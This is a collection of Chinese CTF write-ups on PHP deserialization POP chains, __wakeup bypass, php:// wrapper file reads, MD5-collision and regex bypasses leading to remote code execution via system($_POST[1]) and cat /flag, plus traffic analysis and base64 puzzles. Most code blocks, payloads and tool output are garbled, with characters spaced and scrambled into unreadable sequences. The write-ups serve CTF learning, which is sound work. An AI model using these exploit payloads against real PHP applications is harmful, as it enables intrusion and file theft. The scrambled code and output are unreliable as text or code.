[BJDCTF 2020]just a rar

下载附件提示为四位数密码rar

爆破易得

使用exiftool来查看图片信息可得

E F D F F F F F F F M J R X Y E X P I I E B C Y I M x i i i i i i i i i I F e x P a m m n i o m e e i l r l l l l l l l M I s R R i d a a c t l C a g x f e e e e e e e e e E F o e e f C d g g o s o b g a i T c l s s o i e e d r e p f o N t S M A I P T T T V u o o B m n i P C i t o a o i o c n e y y y e t l l y m g W H n e C r S x o l m r z d c o r p p p r i u u t e i e g r o i e o e y e i e d m e e e s o t t e n d i m S z l l V f s e i i n i i t t g P S p u e s e i s s E o o o O h h r a o b f r c C s x n U n n r t o m n l s a D h i t n d c p e S a i t a a o e i e e l n a g o i t n n n t r s e t m . n o e g s s s s p j n / e i l p N T o i g u D i D n n m a m a g b t e t e e e r / / T T i i m m e e : : : : : : : : : : : : : : : : : : : : : : : : : : 1 f . 1 2 2 2 - J j i 1 i 1 1 B f ( 5 8 B 8 3 Y 5 0 2 l 0 0 0 0 r P p m . n i l B 8 6 a C 8 . . a 5 1 2 2 w E g a 0 c g a i 0 8 s b 0 5 9 g 6 4 4 - G g 1 h - g n e C x 0 6 . k : : : r e e e { a l r 8 3 j B 0 0 0 - / s n W r i 4 6 p 7 9 9 - j d a y n : 8 g : : : r p i d e 2 2 1 1 - e a f d : 7 7 7 - g n _ a D 0 1 t C 0 1 1 ( 2 a T ( 9 1 1 M 3 , 2 : : : o } 2 4 0 0 t 0 H 2 0 0 0 o 6 u ) : : : r 0 f 1 0 0 o f 0 6 5 l b m + + + a y a 0 0 0 , t n 8 8 8 e : : : M s c 0 0 0 M , o 0 0 0 ) d u i s n e g - b o p t i o n t o e x t r a c t )

flag{Wadf_123}

[陇剑杯 2021]ios(问7)

一位ios的安全研究员在家中使用手机联网被黑,不仅被窃密还丢失比特币若干,请你通过流量和日志分析后作答: 黑客访问/攻击了内网的几个服务器,IP地址为**____**。(多个IP之间按从小到大排序,使用#来分隔,例如127.0.0.1#192.168.0.1)。得到的flag请使用NSSCTF{}格式提交。

下载附件得到了一份log,一份keylog,一份pcap

打开流量文件不出意外tls加密,编辑,首选项,Protocols,tls,导入keylog,文件自动刷新

过滤tls流量 看到有一个192.168.1.8的ip,加入过滤

i p . s r c = = 1 9 2 . 1 6 8 . 1 . 8 & & t l s

可以看到大量盲注的流量

第一个ip确定,在翻了翻没有看到可疑的流量,回到log文件也没看到.8的ip,细看发现.3访问了upload文件指向的ip是172.28.0.2,不止一个hackip

那么受害ip就是172.28.0.2#192.168.1.12 AND flag{172.28.0.2#192.168.1.12}

[SWPUCTF 2021 新生赛]no_wakeup

前面其实还有一题反序列化,代码如下

< c } ? l                                 p a h s                     p s p p p } p } u u u     u                 w b b b b l l l l     l             l i i i $ $ i i } } m c c c t t c f     e       { h h ( l $ $ f i i f $   s       a p u s s u t i e e e e e d a n - - n h n c { c c c m s c > > c i c h h h h i s t a p t s l o o o o n w i d a i - u ; d o m s o > d $ $ $ " ; n i s n a e f t t J n w d ( l h h u d m " a i i s _ = _ i f g s s t c " = d n l ; - - o u e a > > a n s " s = g a p s e 1 t = . d a b t r 2 r = p m s i r " 3 u h i s t u ; 4 c " p n w c 5 t a " ; d m t 6 ( d ) ; o ( " ) m ; r ) ; { i e { n ! " " ; & & $ t h i s - > p a s s w d = = = " c t f " ) {

逻辑很简单,只需要

$ e e e s c c c h h h = o o o n $ $ s e s s e w - - r > > i w a p a l d a l l m s i m i s z ( n w e ) d ( ; = $ = s " ) a " ; d c m t i f n " " ; ;

改掉就行,不细说

no_wakeup

这题需要绕过wakeup

< h e s c $ u ? ? e r h l L n > p a r o a e s h d o w s t e p e r _ s } m r r _ s e i ( r o H s a " e u a e l C p r H p p p } p } p } e i o o c a u u u u u s z n r e H b b b b b e e t t ( a l l l l l e ( e i " { i i i $ $ i $ i i } } $ n n c c c c t t c t c f e = L t g l h h h ( l e - ( a $ $ f i i f i f $ s $ t t 0 s a p u s s u s u t i e e e e _ m y ) s d a n - - n - n h n c { c c G e p ; . m s c > > c > c i c h h h E s e p i s t a p t p t s l o o o T e : h n w i d a i a i - u [ e t p ; d o m s o s o > d $ $ " ' s e " ; n i s n s n a e f t N p e x ) n w w d ( l h o ' e t ; d d m " a i ] ) / _ = _ _ i f g s w ; ; h c " = w = d n l ; - a t o u a e a > k m n s " k s s = g p e l s e 1 e h t = . a ; t r 2 u a r = p s u c r " 3 p 1 u h s p h u ; 4 ( ( c " p w " a c 5 ) $ t a " d ; r t 6 { t ( d ) ; s ( " h ) m ; e ) ; i { i t { s n = - " u > t p & f a & - s 8 s $ " w t ) d h ; ) i ; s - > p a s s w d = = = " w l l m " ) {

可知wakeup在反序列时候会被调用,他的作用会将passwd转为sha1,遂尝试绕过

在网上查过以后知道,当属性个数大于真实个数就会绕过__wakeup()

[ZJCTF 2019]NiZhuanSiWei

进入题目看到代码,注解下

< $ $ $ i } e } ? ? t f p f l > p e i a s h x l s ( e p t e s i e i } } h w s c f { i U = U = U o $ s h e $ g R R R r t e o ( l t 使 h L $ L $ L d e t p e e s i $ e e l _ _ x ( " r c x e n p c x i G G = t $ < $ e h i c a h t h g E E " t b f g o t { l s o i h T T $ w e r i _ ( u s g t [ [ _ e x > l m " ) d $ w $ h _ " " G l t < e a $ N ; $ e p o p l f ' t ' f ' E c ) h t f o f ( a r a i i t e f i p T o 1 c i t i $ s d s g l e x i l a [ m & > h l l f s s h e x t l e s " e & " ( e n e i w = w t ( t " e " s p " o ' l o o _ _ ' ] ' ] w a t ( . / w u e r u $ r f _ ; ; o s o f f ! s ) d n p d i F r s i f l " e ; s a ; l I d w $ t l i a " ; l e s e L ' o t h e l " g f " e r s " E r e e _ e f / l f s i w w _ d x g < _ l " a l s a o e _ " t z e h g a , g a . l r l ) ] j t 1 e g " g p e i d c ; $ $ ; c _ > t " $ " h . P u z o t f t c _ f p g H n e m e i f o c i ' . P s ( e x l " n o l , e $ t e $ t n e r p t p e t ) " i a o a n e ) N a s s t n o l s t s s t { t u i w h w ( s s z o e o $ ( n e e r r t $ o l d z d e t w e ) j x e ! s ; c t x " s t , t . f , p " ' h r ' p ' r ) ' ) P = H = . P = " " < w / e h l 1 c > o < m / e b r t > o " ; t h e z j c t f " ) ) {

那么第一步就是想办法另其为true

i f ( i s s e t ( $ t e x t ) & & ( f i l e _ g e t _ c o n t e n t s ( $ t e x t , ' r ' ) = = = " w e l c o m e t o t h e z j c t f " ) )

他需要text传入的内容等于welcome to the zjctf,可以利用伪协议完成

d a t a : / / t e x t / p l a i n , w e l c o m e t o t h e z j c t f

if这关算是过了,跟踪代码,检测了flag字符串,如果不存在直接把文件带出来

但是不能直接useless.php输入,因为是include包含所以php会被作为代码执行依旧是伪协议php://filter/convert.base64-encode/resource=base64编码带出

解码后得到代码

< c } ? ? l > p a h s p s p p } u u F b b l l l a i i i r } g c c f e { ( t $ f i u f u s e e r i n s c c n / l c e h h f e t t o o ( l ; i ( " a o $ f " U g n t i < . h l b R p i e r h _ s _ > S p t - g " O o > e ; s f t C t i _ L r l c O i e o S n ) n E g ) t ( { e ! ) n / { t / s / ( C $ O t M h E i s O - N > f P i L l Z e " ) ) ; ;

这里的魔术方法使用的是__tostring(),也就是说在输出的时候自动执行,那么反序列化的构造也就清楚了

< c } $ $ e e ? ? l n n c c > p a - h h h s = > o o p s p p } f u u n i $ s F b b e l n e l l l w e ; r a i i i } i g c c f F = a { ( l l $ f i a " i f u s e e r g f z i n s c c e ( l e / l c e h h t ) a ( f e t t o o u ; g $ l ; i ( r . n a o $ f " n p ) g n t i < h ; . h l b ( p p i e r " " h _ s _ > U ; p t - g " o > e ; R s f t t i _ S r l c O i e o n ) n C g ) t L ( { e O ) n S { t E s ( ! $ / t / h / i C s O - M > E f i O l N e ) P ; L Z " ) ;

查看源码就好

[SWPU 2024 新生引导]Ser1

代码

< h e c } c } c } $ u ? ? i r l l l a n > p g r a a a = s h h o s s s $ e p l r s p p p } s p p p } s p p p } _ r i _ u u u u u u u u u G i g r s b b b s b b b s b b b E a h e t l l l t l l l t l l l T l t p e i i i e e i i i $ e i i i e [ i _ o p c c c c p c c c t p c c c v ' z f r 0 h t h t a C e i t n $ $ f o w $ $ f i h $ $ f l T ( l i e M O u 0 z y u s r h a u ( F $ e n { a m n $ { a e n - 3 a m n $ ' a ( g n o c t b d c > 3 j i c t ] ) _ ( b g t h u a t z { i l t h ; ; _ 0 o e i i z y i a m u i i F ) ; l o s a e o b i o o s I ; i n - b d n u ; s n - L ; > u a z i > E M ; ; a ; h _ _ a _ b _ a _ d n t u c j ) e b o - a i ; s o s > l m t ; t m l i r / r a ( ) u / i n $ ; c n b m t M g o e ( a ( ( t ) n ) ) h { b { ; o o / d / , z $ a a s b r t u g e z s p a ) t b { w u 0 s t 使 e p e t c h h r o 3 3 _ _ t o s t r i n g ( ) m a n b o c a l l

先看第一部分__destruct()当对象销毁执行,第二个__tostring()当对象作为字符串输出的时候执行,第三个__call()允许执行一个不存在的对象方法

那么逻辑也出来了将Manbo赋值为 steptw0 对象 使得echo时候调用__tostring(),再将zabuzabu赋值为stepthr33对象之后因为前面的输出会触发调用,而manbo对象不存在所以调用call

$ $ $ $ e s s s s c t t t t h e e e e o p p p p 0 0 0 0 s n n n n e e e e e r - - - i = > > > a M M M l n a a a i e n n n z w b b b e o o o ( s - - $ t = > > s e z z t p n a a e 0 e b b p n w u u 0 e z z n ( s a a e ) t b b ) ; e u u ; p - t = > w h 0 n a ( e j ) w i ; m s i t e = p t ' h s r y 3 s 3 t ( e ) m ; ( " c a t / f l a g " ) ; ' ;

[陇剑杯 2023]hard_web_1

考点是wireshark的使用

问我们开放了那些端口,这里的服务器指的应该是162.180

那么过滤服务器返回客户端的syn ack就好

i p . d s t = = 1 9 2 . 1 6 8 . 1 6 2 . 1 8 8 a n d t c p . f l a g s . a c k = = 1 a n d t c p . f l a g s . s y n = = 1

flag{80,888,8888}

[SWPUCTF 2022 新生赛]ez_ez_unserialize

代码:

< c { } ? l p a h s p s p f { } f { } f { } u u u u X b n n n l c c c i t $ t i } t h c i t i f i i / o h o o g f $ n i n ( n h l x s $ $ l a - t t i g = _ > _ h h _ g c x w i i d h i o a s s e t s _ n = k - - s _ F s e > > t f i I t $ u x x r i n L r x p u l E u ; ( ! = c e f _ c ) = t ( l _ t / = ( $ l ; ( / _ ) t l $ F / h l x _ I / i l ) F L s l / I E - a / L _ > g E _ x . _ ; ) p _ ; h ) p {

一眼过去就知道要修改的对象是x,但是这里存在了一个__wakeup()检测x是否等于__FILE__如果不等于会再做一次赋值

https://blog.csdn.net/m0_73512445/article/details/132513838

可以用这个方法绕过,修改属性个数,令其不匹配,他有一个cvecve-2016-7124

< ? p h p $ f l a g = " N S S C T F { e 6 5 1 e a 4 9 - 6 5 6 9 - 4 7 7 8 - 8 c b c - c 4 7 b 6 9 8 e 2 a 9 d } " ;

POP链2

题解

c } c } c } $ $ $ $ $ $ $ e u l l l n n n n n n n c n a a a 1 2 3 1 2 3 3 h s s s s - - - - o e s v f } s v f } s v v f } f } = = = > > > > r a u a u a a u u n n n r s i N r n N r n N r r n n n n n a a a e e a S c S c S c c e e e m m m s r l S $ t e S $ t e S $ $ t $ t i } w w w e e e i i 1 n i c 2 n i c 3 n r i t i f a z a o h a o h a e h N N N = = = = l e { m n o { m n o { m s n 3 i n 4 ( S S S i ( e e e ; . s . $ e S S S $ $ $ ' z $ ; $ ; $ 访 ; - t c 1 2 3 n n n n e _ _ t _ t $ _ 访 > _ h h ( ( ( 2 3 3 s ( G d h t h t g n c i o ) ) ) ; ; ; s $ E e i o i h e a a s ; ; ; c n T s s S s $ i t m l - g t 1 [ t - t - t s ( e l > e f ) ' r > r > h - $ - ( r t ' ; n u n i n i > n $ > $ e e ; ' c a n a s n a t g n s n ] t m g m - a m h e a v ) ( e ( e > m e i t m = ( ; ) ; ) - n e ) s f e g = ' > a { - l , e = F { { t m $ > a t L e e t n g $ f ' A s - N h a ( a l n G t > S i m ) r a s ' ; t S s e ; g g s ) 1 e 3 - - u ( c ; . s > > m ) t t t g e f 2 e e n ' . s t t ) $ t f s t l ) { $ h a { t i g h s ( i - ) _ s > c - n a > a l n m l a 使 e _ m - g e > e _ t t c e a s l t l N S S 3 : : _ _ g e t ( ' t e s t ' )

链条

N N N N S S S S S S S S 1 2 3 3 : : : : : : : : _ _ _ _ _ _ _ _ d t g c e o e a s S t l t t ( l r r ' ( u i t ' c n e g t g s e ( ( t t ) ) ' f ) l a g ' e e ) c c $ h h t o o h i $ $ s i t t - f h h > i i n ( s s a $ - - m r > > e e n n - s a a > m m g = e e e = - t = > f t l ' e a n N s g s S t ( s S ) c 2 t : f : ' _ N ) _ S N t S S e o 3 S c S : 3 h t : : o r _ : i _ _ g n g _ e g e c t ( t a e ) ( l n ' l v t ( ( e ' ' s g F t e L ' t A ) f G l ' a ) g ; ' )

[HUBUCTF 2022 新生赛]checkin

< s $ $ i $ $ i } } ? ? h u p n i d f e > p o s a c n a l h w e s l f t ( s p _ r s u o a $ e e e s n w d _ d c { c o a o e = u a h h u m r ( n t o o r e d " i s a c f s e _ $ " e l s r u f u ( = = a e i n l s _ g t a s a e _ " " . ( l e g r F t t p $ i r ; n I h h h _ z i a L i i p G e a m E s s " E l e _ _ _ ) T = i _ i i ; [ z o ) s s / ' u e r ; _ _ i n [ s n h n s ' p e o e f e u a c t r o r s s r _ e ' i e s e k ] a r w t n I ) l n o " o ? i a r ; w c z m d n h $ e e _ a _ ( ' e t n G $ ] r o g E i = r _ e T n = o y d [ f $ r o ' o u ! u t i ) s " " h n ; e ; ; o f r s o n e ' a ] m t : e w & o " & " $ d ; a t a _ u n s e r i a l i z e [ ' p a s s w o r d ' ] = = $ p a s s w o r d ) {

反序列化 第一反应是修改user和pass来绕

但是他在引入flag的时候修改了这两个数值

i } } f e l ( s $ e e e d c { c a h h t o o a _ $ " u f u n l s s a e e g r r ; n i a a m l e i z o e r [ ' p u a s s e s r w n o a r m d e ' e ] r = r = o $ r u ! s " e ; r n a m e & & $ d a t a _ u n s e r i a l i z e [ ' p a s s w o r d ' ] = = $ p a s s w o r d ) {

重点在这里

双等于 可以ture绕过

< $ e ? i c p n h h f o p o s = e a r r i r a a l y i ( z " e u ( s $ e i r n n f a o m ) e ; " = > t r u e , " p a s s w o r d " = > t r u e ) ;

[第五空间 2021]pklovecloud

反序列化 感觉稍微进阶了一点

< i c { } c { } c { } i { } e { } ? ? n l l l f l > p c a a a s h l s s s ( e p u s f { } s p p p f { } f { } s p p p f { } i $ e h d u r u u u u u u u u s l c i e p n a o b b n n a b b b n s o h g k c c t l l c c c l l l c e g o h ' s t r p e i i t $ t i e i i i t $ $ i { $ } t D l f h i e c c c i t i f c c c i t t f f ( a $ i l o o t t o h o o h h ( i $ t l g a w n u e $ $ n i n ( $ $ $ n i i $ l _ a o h g r d n n s i r f o d s s t e i { } e { } G g t . e n e o - s e i p o e - - h f l E = D _ p c $ u v _ > _ s t l e c c > > i = s T a f h h " c t a c c t e u e n k h o o s ( e [ u t i p o P i r ; o i o t r n s e o p p - " f r r ' n a l ' _ k n o n n S ( n a t r _ e e > . i e e p s ; e ; n d n s d t $ m a ; n n n o / l t t k e ( a v e ; t e r t $ e c a s s p { e u u s r _ m e r r r i h t ; k m t t e $ _ r r ' i _ e r ; u n i h ; e a a n t g n n ] a f ( y c = g s i ( c c s h e ) l i ) t ( - s ) k k t i t f " ) i l s ( n ) > - - a s _ i k z e a ) e c > = > c - c l e e _ f w i c n k > o e y ( _ e n i u e - f n _ s $ ) ^ p d n n u > i t g t _ ; . k e d s t n l e e o G ^ s r e e r e e n t n E " h ) r r o u n t _ e T ; o ) - i n t a s c [ w > a r m ( o l ' ; e l = o e $ n o p c i n } f t s k h z $ " i e t s o e h = ; l n ~ ' _ ( e = e t " ] n $ a = ) s ; ) a t t ) ( ; m h ; $ $ e i t f ( s h i ) - i l ; > s e d - ) o > ; c o k p e e r n ) s ; t a c k - > n o v a )

先看目标 这里的目标是读取目标 关键点位于

f i l e _ g e t _ c o n t e n t s ( $ f i l e ) ;

以及一个if的判断点

$ t h i s - > o p e n s t a c k - > n e u t r o n = = = $ t h i s - > o p e n s t a c k - > n o v a

换到另一个函数,入口是__toString()由下面的echo $logData;触发

那么第一阶段就是

$ s a e r = i a n l e i w z e a ( c $ p a ( ) ) ; ;

触发$this->cinder = new pkshow;,修改这里就可以完成第二阶段

$ t h i s - > c i n d e r = n e w a c e ;

那么这时候触发的就是ace中的echo_name()了回到ace,现在要解决的就是$this->openstack->neutron === $this->openstack->nova也是卡我最久的一个点,他反序列化了docker中的内容$this->openstack = unserialize($this->docker); 这里让docker等于null即可

第一种的解法

< i c { } c { } c { } $ $ $ e i { } ? ? n l l l a b b c f > p c a a a - h h l s s s = = > o ( p u s f { } s p p p f { } f { } s p p p f { } d i $ e d u r u u u u u u u u n n o u s l c e p n a o b b n n a b b b n e e c r s o h k c c t l l c c c l l l c w w k l e g o ' s t r p e i i t $ t i e i i i t $ $ i { } e e t D f h i e c c c i t i f c c c i t t f a a r n ( a $ l o o t t o h o o h h ( c c = c $ t l a w n u / e $ $ n i n ( $ $ $ n i i $ p e n o _ a o g r d n n s i r f o d s s t $ i { } e { } ( ( u d G g . e n e o - s e i p o e - - h f f l ) ) l e E = D p c $ u v _ > _ s t l e c c > > i i s ; ; l ( T a h h " c t a c c t e u e n k h o o s l ( e ; s [ u t p o P i r ; o i o t r n s e o p p - e f r r e ' n a ' _ k n o n n S ( n a t r _ e e > i e e r p s ; ; n d n s d t $ m a ; n n n o = l t t i k e a v e ; t e r t $ e c a s s p e u u a s r m e r r r i h t k m t t e " _ r r l ' i e r ; u n i h = ; e a a n . g n n i ] a ( y c = g s i ( c c s / e z ) l ) t ( - s " ) k k t { t f " e ) i s / ( n ) > - . - a $ _ i k ( z a ) e c > . = > c t c l e $ e f w i c / n k h o e y a ( e / n i n u e - i n _ s ) $ ^ / a d n s n u > s t g t ) _ . n c e d s s t n - e e o ; G ^ e e r e c e r e > n t n E " w ; ) r t r o u f t _ e T ; ) - f i n t i s c [ > a a r l ( o l ' e s l = o e $ n o p c d i n n f t s k h a z $ a i e t s o s e h = m l n ~ ' _ d ( e = e e t " ] n f $ a = } ) s ; ) a l t t " ) ( ; m a h ; $ ; $ e g i t f ( " s h i ) ; - i l ; > s e d - ) / o > ; c o k p e e / r n ) s ; t a c / k f - l > a n g o v a d ) o c k e r d o c k e r a c p

[NSSRound#16 Basic]RCE但是没有完全RCE

分为两个阶段

< e h i i } } ? r i n f p r g c e h o h l ( l p r l u i i } } s e _ i d s f e c r g e s e h e h ( e l { o p t ' t ( i } } s e o _ l ( s f e c " r f e $ t e h t i v _ r ( l { o i l e G i i e s e n e l E n s c e c " g ( 2 T g s h h ( _ . [ ) e o { o 0 _ p ' $ t M ) f h m _ ( $ " D ; i p d G $ l 5 l ' 5 E _ e ~ e ) _ T P v " _ ; 1 [ O e ; _ ' ' S l ) ] m T 2 ; ) d [ ; 5 ' " & _ m ; & 1 d ' 5 i ] _ s 3 s ! ' e = ] t = ) ( & $ ( & _ s m G t d " E r 5 ; T i ( [ n $ ' g _ m ) P d $ O 5 _ S _ G T 2 E [ ' T ' ] [ m ) ' d ) m 5 d _ { 5 3 _ ' 2 ] ' ) ] = & = & m m d d 5 5 ( ( $ $ _ _ P G O E S T T [ [ ' ' m m d d 5 5 _ _ 1 3 ' ' ] ] ) ) ) = = { = m d 5 ( $ _ G E T [ ' m d 5 _ 2 ' ] ) ) {

先看代码

( s t r i n g ) $ _ G E T [ ' m d 5 _ 1 ' ] ! = = ( s t r i n g ) $ _ G E T [ ' m d 5 _ 2 ' ]

要求必须不一样

m d 5 ( $ _ G E T [ ' m d 5 _ 1 ' ] ) = = = m d 5 ( $ _ G E T [ ' m d 5 _ 2 ' ]

要求md5必须强相等,那就必须真实碰撞了可以使用fastcoll来生成后url编码

a a . . t t x x t t % % 0 0 A A % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 % % 0 0 0 0 _ _ % % A A 2 2 D D % % A A 6 6 % % C C 4 4 V V % % B B 4 4 % % 8 8 B B % % C C 8 8 % % B B 7 7 Y Y % % 1 1 4 4 % % 4 4 0 0 % % 7 7 D D % % C C 0 0 % % 1 1 F F % % 9 9 9 9 % % A A D D % % D D 4 4 % 4 B % 4 3 % D 3 % D 2 % 7 2 % 7 A % 3 A i 3 % i 1 % 4 1 B 4 % B 3 % C 3 % C B % 5 B K 5 % K 4 % 0 4 C 0 % C D % 6 D Z 6 % Z 0 % A 0 % A B % 9 B % 9 C % 6 C % 6 D % A D % A B % F B % F 9 % 7 9 % 7 A % 5 A % 5 8 % 7 8 b 7 p b % p 9 % B 9 % B B % B B U B % % 3 D A 5 X % % 3 A A 9 X Z % % A 8 9 7 Z 1 % 0 8 % 7 A 1 1 0 % % D A 6 1 % % 0 D 9 6 q % % 0 A 9 F q % % 3 A A F % % 8 3 F A % % 9 0 8 F % % 5 9 D 8 % % D 5 D D k % % D 1 D F k % % F 1 E F % % A F B E % % 7 A B B % % 7 7 D B % % 8 7 A D u % % 8 D A 3 u w % % D D 3 F w % % 1 D 2 F % % A 1 D 2 m % % A B D D m % % 5 B C D % % D 5 3 C J % 3 D % 3 D J 4 3 4 % % D 7 4 D % % B 1 4 3 % % 7 7 D F % % 1 3 3 D % % 7 F F 6 % T 3 y D % % F F 7 6 M T X y A % % F D 7 E M % X 5 A D % g D z E % % 2 5 4 D r g . z % % F 2 1 4 e r % . 9 % E F s 1 % e 1 % 5 9 % E 1 s 2 % % 1 8 5 C % % 1 3 2 C % a 8 % C D % D B % C 0 % 7 6 % 0 A % 1 D % D 0 % 1 0 % 7 E % 1 A % 1 8 % C 0 % 1 B % 7 E % 1 E % 3 8 % C 8 % 3 B % 7 F % F E % 3 1 % 7 8 % 3 2 % 8 F % F D % B 1 V 7 s % j 2 k 8 % 5 B V s j k

第二阶段

< e h $ $ i } e ? r i s c f v p r g h m ( a h o h e d p l p r l l r d ( _ i l = e i $ r g g e s e h = $ _ ( h p t _ m " e o _ $ G a H l r f _ E t a l t i P T c c ( i l O [ h k $ n e S ' ( e c g ( T c ' r m ( _ [ m / ! d 0 _ ' d f ! ) ) F s ' ! ) ; I h ] l ! ; L e ; | ! E l a ! _ l | ! _ ' g ! ) ] | " ; ; \ ) * ; | \ ? / i ' , $ c m d ) ) {

这里有一个很有意思的解法

/ s 3 h z e _ l R l C = 3 u . r p l h d p e ? c c o m d d e = & s 1 y = s c t a e t m ( / $ f _ l P a O g S T [ 1 ] ) ;

这样操作后eval函数中的样式就是

e v a l ( u r l d e c o d e ( s y s t e m ( $ _ P O S T [ 1 ] ) ) ) ;

这么做就让正则验证形同虚设,不可谓不妙

[CISCN 2023 华北]ez_date

先读代码

< c } u ? ? l / n > p a b s h s a e p s p p p p { } s r u u u u e i d b b b b 6 a a l l l l 4 l t i i i i i } i } } i e c c c c f f z ( ( e e { $ $ $ f i l ( a b f u s d ( $ e s d b ; ; i n _ i $ c c e i a l c a e t o h e s e t r ( h n o { ( e ; i r ' i t ) 6 o a n s f e f ; 4 n y o - i n i _ ( > l t l d $ a a e e e _ t r = _ c w h r ! g o a i a = d e d k s y = d a t e e - ' a t _ ( u > ) $ t e c $ p a ; t a ( o _ ( ) h $ n G ) i t t E s h e T - i n [ > s t ' i b - s c s ) > ( o _ f $ d a & i d e r & l a ' r e t ] a ( ) a ) y m ; ) ) ( d ; ; $ 5 t ( h $ i t s h - i > s b - ) > ) a { ) = = = m d 5 ( $ t h i s - > b ) ) & & ( s h a 1 ( $ t h i s - > a ) = = = s h a 1 ( $ t h i s - > b ) ) ) {

经过实验 ($this->a !== $this->b)这个弱比较可以通过字符数字的形式绕过

i f ( 1 ! = = " 1 " & & m d 5 ( " 1 " ) = = = m d 5 ( 1 ) ) T R U E

那么不难注意到重点就是data了,file会经过一次data,在网上找过之后可以发现解决方案为

/ f \ l \ a \ g

实验

e c h o d a t e ( " / f \ l \ a \ g " ) ;

payload:

< e c } $ $ $ $ e ? ? r l x x x x / c > p r a x x x x u h h o s x x x x n o p r s p p p p { } - - - s _ u u u u = > > > e b r d b b b b a b f r a e a l l l l n i i s p t i i i i e = = l b a e o e c c c c w 2 " e a l 6 r ; 2 s i 4 t { $ $ $ f d " = e z _ i a b f u a ; " 6 e e n ; ; i n t / 4 ( n g l c e f b c ( e t ( \ a o 0 ; i ) l s d ) o ; \ e e ; n a 6 ( \ 4 s g $ _ e _ " _ d r w ; G e i a E c a k T o l e [ d i u ' e z p c ( e ( o " ( ) d T $ e z x ' o x ] 0 x O ) i ) J ; k Y X R l I j o z O n t z O j E 6 I m E i O 3 M 6 M T o i M i I 7 c z o x O i J i I j t p O j E 7 c z o 0 O i J m a W x l I j t z O j Q 6 I m Z s Y W c i O 3 0 = " ) ) ;

[安洵杯 2019]JustBase

变种base64 没什么难度

先看编码

V G h l I G d l b @ x v Z # k g b @ Y g d G h l I E V h c n R o J # M g c # V y Z m F j Z S B p c y B k b @ ! p b m F ) Z W Q g Y n k g d G h l I H B h c n R p Y # V s Y X I g c H J v c G V y d G l l c y B v Z i B # Y X R l c i $ g U H J l c @ V u d C B v b i B F Y X J ) a C B p b i B z b @ x p Z C w g b G l x d W l k L C B h b m Q g Z @ F z Z W ( ! c y B z d G F ) Z X M s I H d h d G V y I G l z I G V $ Y @ V w d G l v b m F s b H k g c m V h Y # R p d m U u I E l ) I G R p c # N v b H Z l c y w g d H J h b n N w b # J ) c y w g Y W % k I H B y Z W N p c G l ) Y X R l c y B t Y W % % I G N o Z W ! p Y @ F s I G N v b X B v d W % k c y B h b m Q g a X M g Y @ ( u c # R h b n R s e S B t b @ R p Z n l p b m c g d G h l I G Z h Y @ U g b @ Y g d G h l I E V h c n R o L i B F d m F w b # J h d G V k I G Z y b @ ) g d G h l I G ( j Z W F u c y w g d @ F ) Z X I g d m F w b # I g Z m ( y b X M g Y @ x v d W R z L C B z b @ ! l I G ( m I H d o a W N o I G F y Z S B ) c m F u c # B v c n R l Z C B i e S B # a W % k I G ( @ Z X I g d G h l I G N v b n R p b m V u d H M u I E N v b m R l b n N h d G l v b i B m c m ( t I H R o Z S B j b G ( ! Z H M g c H J v d m l k Z X M g d G h l I G V z c @ V u d G l h b C B h Z @ V u d C B v Z i B j b @ % ) a W % l b n R h b C B l c m ( z a W ( u O i B y Y W l u L l R o Z S B y Y X R l I G F ) I H d o a W N o I G E g b W ( s Z W N ! b G U g b @ Y g d @ F ) Z X I g c G F z c @ V z I H R o b # V n a C B ) a G U g Y # l j b G U g a X M g b m ( ) I H J h b m R v b Q p B b m Q g d G h l I G Z s Y W c g a X M ^ I E N U R n s y M i ! R V ) V S V F l V S U * t U E x L S k h H R k R T L U F a W E N W Q k % N f Q = =

结尾等于号 猜测是base64 虽然其中有很多不属于64的字符,但尝试赛博厨子解码先

尝试使用!-)替换内容解码

i t x c p m a o r p b = d i o l e n r e } " t t V = ( = G c b h o a { ' l d s ! I . e e ' ' G j ) 6 : : d o 4 l i ' ' b n 1 6 @ ( ' ' x t , , v a Z b ' ' # l @ & k e ' ' g . : : b g @ e ' ' Y t 2 7 g ( ' ' d c , , G h h a ' l r # I , ' ' E c : : V h h a ' ' c r 3 8 n ) ' ' R , , o f J o ' # r $ M ' ' g c : : c h # a ' ' V r 4 9 y ' ' Z i , , m n F ' j x % Z ) ' ' S : : B p ' ' c 5 0 y ' ' B , k b @ ! p b m F ) Z W Q g Y n k g d G h l I H B h c n R p Y # V s Y X I g c H J v c G V y d G l l c y B v Z i B # Y X R l c i $ g U H J l c @ V u d C B v b i B F Y X J ) a C B p b i B z b @ x p Z C w g b G l x d W l k L C B h b m Q g Z @ F z Z W ( ! c y B z d G F ) Z X M s I H d h d G V y I G l z I G V $ Y @ V w d G l v b m F s b H k g c m V h Y # R p d m U u I E l ) I G R p c # N v b H Z l c y w g d H J h b n N w b # J ) c y w g Y W % k I H B y Z W N p c G l ) Y X R l c y B t Y W % % I G N o Z W ! p Y @ F s I G N v b X B v d W % k c y B h b m Q g a X M g Y @ ( u c # R h b n R s e S B t b @ R p Z n l p b m c g d G h l I G Z h Y @ U g b @ Y g d G h l I E V h c n R o L i B F d m F w b # J h d G V k I G Z y b @ ) g d G h l I G ( j Z W F u c y w g d @ F ) Z X I g d m F w b # I g Z m ( y b X M g Y @ x v d W R z L C B z b @ ! l I G ( m I H d o a W N o I G F y Z S B ) c m F u c # B v c n R l Z C B i e S B # a W % k I G ( @ Z X I g d G h l I G N v b n R p b m V u d H M u I E N v 